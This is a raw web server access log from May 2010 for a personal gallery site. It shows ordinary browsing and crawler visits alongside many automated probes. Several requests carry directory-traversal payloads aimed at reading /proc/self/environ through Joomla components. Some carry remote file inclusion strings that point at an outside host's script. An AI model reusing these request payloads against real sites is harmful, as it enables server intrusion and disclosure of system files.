76.83.253.0 - - [23/May/2010:23:08:54 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:08:55 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:08:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:16 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:31 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:31 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:31 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:31 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:31 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:31 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:31 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:31 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:32 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:32 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:32 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:09:56 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:10:07 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:10:07 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:10:07 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.83.253.0 - - [23/May/2010:23:10:07 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
69.73.180.30 - - [23/May/2010:23:10:11 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:10:11 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:11:45 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:11:52 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.114.41.16 - - [23/May/2010:23:11:57 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
93.114.41.16 - - [23/May/2010:23:11:58 -0500] "GET //index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
93.114.41.16 - - [23/May/2010:23:11:58 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
79.174.72.137 - - [23/May/2010:23:12:10 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
79.174.72.137 - - [23/May/2010:23:12:10 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
95.211.18.156 - - [23/May/2010:23:12:22 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [23/May/2010:23:12:22 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.89.55.2 - - [23/May/2010:23:13:30 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
69.73.180.30 - - [23/May/2010:23:15:07 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [23/May/2010:23:16:08 -0500] "GET /logs/access_log.1158537600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
93.114.41.16 - - [23/May/2010:23:16:42 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
69.73.180.30 - - [23/May/2010:23:17:04 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:17:04 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.204.197 - - [23/May/2010:23:17:32 -0500] "GET /logs/access_log.1240099200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.73.180.30 - - [23/May/2010:23:19:29 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:19:29 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.114.41.16 - - [23/May/2010:23:22:58 -0500] "GET //index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
87.250.255.243 - - [23/May/2010:23:23:32 -0500] "GET /logs/access_log.1186617600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
80.65.166.74 - - [23/May/2010:23:23:32 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
80.65.166.74 - - [23/May/2010:23:23:33 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.65.166.74 - - [23/May/2010:23:23:57 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
80.65.166.74 - - [23/May/2010:23:23:57 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.180.30 - - [23/May/2010:23:26:00 -0500] "GET /logs/access_log.1271894400/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:26:00 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:26:00 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [23/May/2010:23:27:00 -0500] "GET /logs/access_log.1207440000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.73.180.30 - - [23/May/2010:23:29:00 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.114.41.16 - - [23/May/2010:23:31:19 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
93.114.41.16 - - [23/May/2010:23:31:20 -0500] "GET //index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
93.114.41.16 - - [23/May/2010:23:31:20 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
173.203.115.77 - - [23/May/2010:23:31:45 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [23/May/2010:23:32:13 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [23/May/2010:23:33:05 -0500] "GET /logs/access_log.1186704000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.73.180.30 - - [23/May/2010:23:33:12 -0500] "GET /logs/access_log.1271894400/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:33:12 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:33:12 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:34:55 -0500] "GET /logs/access_log.1208995200/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:34:55 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:34:55 -0500] "GET /logs/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.204.229 - - [23/May/2010:23:36:31 -0500] "GET /logs/access_log.1213056000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.235.124.132 - - [23/May/2010:23:36:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
66.235.124.132 - - [23/May/2010:23:36:36 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
87.250.255.243 - - [23/May/2010:23:40:42 -0500] "GET /logs/access_log.1197331200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [23/May/2010:23:43:48 -0500] "GET /logs/access_log.1204588800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [23/May/2010:23:44:40 -0500] "GET /logs/access_log.1213920000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [23/May/2010:23:45:09 -0500] "GET /costume/thmb6.htm HTTP/1.0" 200 3210 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.73.180.30 - - [23/May/2010:23:46:10 -0500] "GET /logs/access_log.1208995200/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
64.27.53.238 - - [23/May/2010:23:46:30 -0500] "GET /logs/access_log.1271548800//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:23:46:30 -0500] "GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
64.27.53.238 - - [23/May/2010:23:46:30 -0500] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.73.180.30 - - [23/May/2010:23:48:15 -0500] "GET /logs/access_log.1271894400/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.73.180.30 - - [23/May/2010:23:48:15 -0500] "GET /index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
